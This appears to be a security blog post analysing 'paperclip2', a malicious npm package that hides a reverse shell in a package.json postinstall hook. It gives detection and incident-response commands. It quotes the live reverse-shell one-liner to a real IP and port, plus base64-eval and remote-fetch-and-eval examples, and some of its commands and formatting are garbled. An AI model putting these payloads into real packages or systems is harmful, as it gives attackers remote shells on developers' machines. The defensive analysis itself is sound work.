Listen to this Post

Introduction:
The npm ecosystem has long been a cornerstone of modern JavaScript development, but its convenience comes with a dark side that many developers overlook. A recently discovered malicious package, “paperclip2,” demonstrates a terrifyingly simple yet devastating attack vector: a reverse shell payload hidden entirely within a package.json file, with no JavaScript files whatsoever. This attack exploits npm’s postinstall lifecycle hook—a feature that automatically executes scripts immediately after package installation—to compromise systems with nothing more than a one-line command. What makes this particularly insidious is that traditional malware scanners focus on analyzing JavaScript files for malicious code, completely missing the payload concealed in plain sight within the configuration file.
Learning Objectives:
- Understand how npm’s postinstall lifecycle hooks can be weaponized to execute arbitrary commands without any JavaScript files
- Learn to detect and mitigate malicious packages that hide payloads exclusively in package.json
- Master practical commands and techniques for auditing dependencies, inspecting package.json files, and identifying suspicious postinstall scripts
- Develop a comprehensive defense strategy against supply chain attacks targeting the npm ecosystem
You Should Know:
1. The Anatomy of a Configuration-Only Attack
The paperclip2 package represents a paradigm shift in how attackers think about evading detection. By containing only a package.json file and no executable JavaScript, the package bypasses security scanners that are trained to look for malicious code in .js files. The postinstall script within package.json contains a one-liner that connects to a command-and-control server at 185[.]112[.]147[.]174 on port 7007 and spawns a reverse shell. When a developer runs npm install paperclip2, the package installs and immediately executes the postinstall script, granting the attacker remote access to the victim’s machine with the privileges of the user running the command.
Two related packages—vps-maintenance and vps-maintenance-paperclip-adapter—carry the identical reverse shell payload. Combined, these three packages have been downloaded 1,049 times per week, demonstrating how quickly such threats can propagate through the ecosystem.
Step-by-Step Guide: Detecting Configuration-Only Malware
Before installing any npm package, you should inspect its package.json for suspicious postinstall scripts. Here’s how:
Linux/macOS:
View the postinstall script without downloading the package npm view paperclip2 postinstall Or inspect the package.json directly after download (but before install) npm pack paperclip2 && tar -xzf .tgz && cat package/package.json | grep -A5 -B5 "postinstall" Check for suspicious patterns in package.json cat package.json | grep -i "eval|Function|base64|https:\/\/|curl|wget|exec|import"
Windows (PowerShell):
View package metadata npm view paperclip2 postinstall Extract and inspect npm pack paperclip2 tar -xzf .tgz Get-Content package\package.json | Select-String -Pattern "postinstall" -Context 2,5
2. The Postinstall Execution Mechanism Unmasked
npm’s lifecycle scripts are a legitimate feature designed to automate tasks like compilation and dependency management. However, attackers have weaponized this functionality. The postinstall script executes automatically and silently after package installation, often before developers have a chance to review the code. This creates a zero-click infection vector—simply running `npm install` on a malicious package is enough to compromise your system.
The paperclip2 attack demonstrates an especially dangerous variant because there is no JavaScript file to analyze. The entire payload lives in the package.json “scripts” section:
{
"name": "paperclip2",
"version": "1.0.0",
"scripts": {
"postinstall": "node -e \"require('child_process').exec('bash -i >& /dev/tcp/185.112.147.174/7007 0>&1')\""
}
}
This one-liner uses Node.js’s child_process module to execute a bash reverse shell command, connecting back to the attacker’s server.
Step-by-Step Guide: Understanding and Analyzing Postinstall Payloads
To fully understand what a postinstall script does, you need to decode and analyze it:
Decode Base64-encoded payloads:
If the postinstall contains base64 encoded data
echo "dmFyIH...base64 string..." | base64 -d
For Node.js eval with base64
node -e "console.log(Buffer.from('base64string','base64').toString())"
Trace network connections from postinstall scripts:
Monitor network connections during npm install (Linux) sudo tcpdump -i any port 7007 -1 Or use netstat to check for suspicious connections after install netstat -tunap | grep 7007
Windows:
Monitor for connections to known malicious IPs netstat -ano | findstr "7007" Then find the process tasklist | findstr <PID>
- The Supply Chain Blind Spot: What Scanners Miss
Traditional malware detection relies on signature-based scanning and behavioral analysis of executable files. The paperclip2 attack exposes a critical vulnerability in this approach: security tools that only scan JavaScript files for malicious patterns will completely miss the threat. The absence of any JavaScript files appears designed specifically to evade malware scanners that look for executable code rather than configuration files.
This blind spot is not limited to npm. Similar attacks have been observed in other ecosystems, including PyPI and RubyGems, where package metadata and setup scripts can be used to execute arbitrary code. The attack vector exploits a fundamental trust assumption: that package.json files are configuration, not code.
Step-by-Step Guide: Building a Defense-in-Depth Strategy
Implementing npm security best practices:
- Use `–ignore-scripts` flag when installing packages in CI/CD or when you don’t trust the source:
npm install --ignore-scripts
-
Configure npm to ignore scripts globally (use with caution):
npm config set ignore-scripts true
3. Audit your dependencies regularly:
npm audit npm audit fix
- Use package-lock.json to ensure consistent installations and review changes:
git diff package-lock.json
-
Implement a private npm registry that vets packages before they reach your developers.
-
Use runtime protection tools that monitor for unexpected network connections and process spawns during installation.
-
The Broader Campaign: npm Supply Chain Attacks in 2026
The paperclip2 package is not an isolated incident. In October 2023, Phylum’s automated risk detection platform identified a campaign involving at least 48 malicious npm publications that used similar postinstall hooks to deploy reverse shells. These packages, deceptively named to appear legitimate, contained obfuscated JavaScript designed to initiate reverse shells on package install.
More recently, in April 2026, a coordinated campaign involving 36 malicious npm packages disguised as Strapi CMS plugins was uncovered. These attacks went beyond simple reverse shells—they weaponized locally accessible Redis instances to inject malicious cron jobs, spawned multiple reverse shells on port 4444, and used mknod and dd to create raw device nodes that bypassed standard filesystem permissions to scrape sensitive data like SSH private keys and database files.
The pattern is clear: attackers are increasingly exploiting npm’s lifecycle hooks as a reliable entry point for supply chain compromises.
Step-by-Step Guide: Incident Response for Compromised npm Packages
If you suspect your system has been compromised by a malicious npm package:
Immediate Actions (Linux/macOS):
1. Identify and kill suspicious processes using the C2 port sudo lsof -i :7007 sudo kill -9 <PID> <ol> <li>Check for reverse shell processes ps aux | grep -E "bash.dev/tcp|nc.-e|sh.-i"</p></li> <li><p>Remove the affected packages npm uninstall paperclip2 vps-maintenance vps-maintenance-paperclip-adapter</p></li> <li><p>Manually inspect and clean package.json and lock files grep -r "paperclip2|vps-maintenance" package.json Remove any references found</p></li> <li><p>Check for persistence mechanisms (cron, systemd, etc.) crontab -l ls -la /etc/cron.d/ systemctl list-units --type=service --all | grep -i suspicious</p></li> <li><p>Check for modified or new files in the last 24 hours find / -mtime -1 -type f 2>/dev/null | grep -v "^/proc|^/sys|^/dev"
Windows (PowerShell – Admin):
1. Find processes using port 7007
Get-1etTCPConnection -LocalPort 7007
Stop-Process -Id <PID> -Force
<ol>
<li>Remove packages
npm uninstall paperclip2 vps-maintenance vps-maintenance-paperclip-adapter</p></li>
<li><p>Scan for malicious entries
Select-String -Path .\package.json -Pattern "paperclip2|vps-maintenance"</p></li>
<li><p>Check for scheduled tasks
Get-ScheduledTask | Where-Object {$_.TaskName -match "suspicious"}
5. Advanced Evasion Techniques: Beyond Simple One-Liners
While paperclip2 uses a straightforward reverse shell command, attackers have developed increasingly sophisticated evasion techniques:
- Base64 Encoding with eval: The most common method combines base64 encoding with eval or Function constructor:
"postinstall": "node -e \"eval(Buffer.from('dmFyIH...','base64').toString())\""This makes the payload invisible when viewing the package.json on npmjs.com.
-
Dynamic Payload Retrieval: The package itself contains no malicious code; instead, it downloads the payload from an attacker-controlled server during installation:
"postinstall": "node -e \"require('https').get('https://evil[.]com/p', r=>r.on('data',d=>eval(d)))\"" -
Multi-Stage Obfuscation: Using dead code segments, string concatenation, variable renaming with dictionaries, and control-flow flattening to obscure the true purpose of the script.
-
Git Hook Exploitation: Hiding payloads in Git hooks that are triggered later, making detection even more difficult.
Step-by-Step Guide: Advanced Detection Techniques
Automated postinstall scanning script (Linux/macOS):
!/bin/bash scan-1pm-packages.sh - Scan all installed npm packages for suspicious postinstall scripts for package in $(ls node_modules); do if [ -f "node_modules/$package/package.json" ]; then postinstall=$(cat "node_modules/$package/package.json" | grep -i "postinstall" | grep -v "^\s//") if [ ! -z "$postinstall" ]; then echo "⚠️ Suspicious postinstall found in: $package" echo "$postinstall" Check for dangerous patterns echo "$postinstall" | grep -iE "eval|base64|https://|curl|wget|exec|child_process|net.connect" && echo " 🔴 HIGH RISK!" fi fi done
Using npm audit with custom rules:
Generate a detailed report
npm audit --json > audit-report.json
Parse for packages with scripts
jq '.advisories[] | select(.findings[].paths[] | contains("postinstall"))' audit-report.json
What Undercode Say:
- Key Takeaway 1: The paperclip2 package proves that malware scanners must evolve beyond analyzing only JavaScript files. Configuration files like package.json are equally dangerous attack vectors that can execute arbitrary code with zero JavaScript present. Security tools need to treat all package metadata as potentially executable content.
-
Key Takeaway 2: The postinstall lifecycle hook is npm’s most dangerous feature from a security perspective. While legitimate packages use it for valid purposes, it provides attackers with a reliable, silent execution mechanism that runs with the user’s full privileges. Organizations should consider using `–ignore-scripts` in CI/CD pipelines and untrusted environments.
Prediction:
-
-1 The npm ecosystem will continue to be a prime target for supply chain attacks, with attackers increasingly focusing on configuration-only payloads that evade traditional detection. We can expect to see a significant rise in “fileless” npm malware that exists only in package.json metadata.
-
-1 The paperclip2 attack represents a warning shot—as more attackers adopt configuration-only techniques, the window between package publication and detection will shrink dramatically. Organizations that rely solely on reactive security measures will struggle to keep pace.
-
+1 This incident will accelerate the development of next-generation software composition analysis (SCA) tools that treat all package artifacts, including configuration files, as executable content. Machine learning models that analyze package.json patterns for anomalies will become standard.
-
-1 The three packages (paperclip2, vps-maintenance, vps-maintenance-paperclip-adapter) with 1,049 weekly downloads have likely already compromised numerous development environments and CI/CD pipelines. The full scope of the damage may take months to uncover.
-
-1 As attackers refine their techniques, we will see more sophisticated obfuscation within package.json, including multi-stage payloads that use base64 encoding, dynamic retrieval from C2 servers, and Git hook exploitation to maintain persistence. Traditional security awareness training will be insufficient to counter these threats.
▶️ Related Video (80% Match):
https://www.youtube.com/watch?v=-SaZiADGLHs
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: Hexploit Did – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


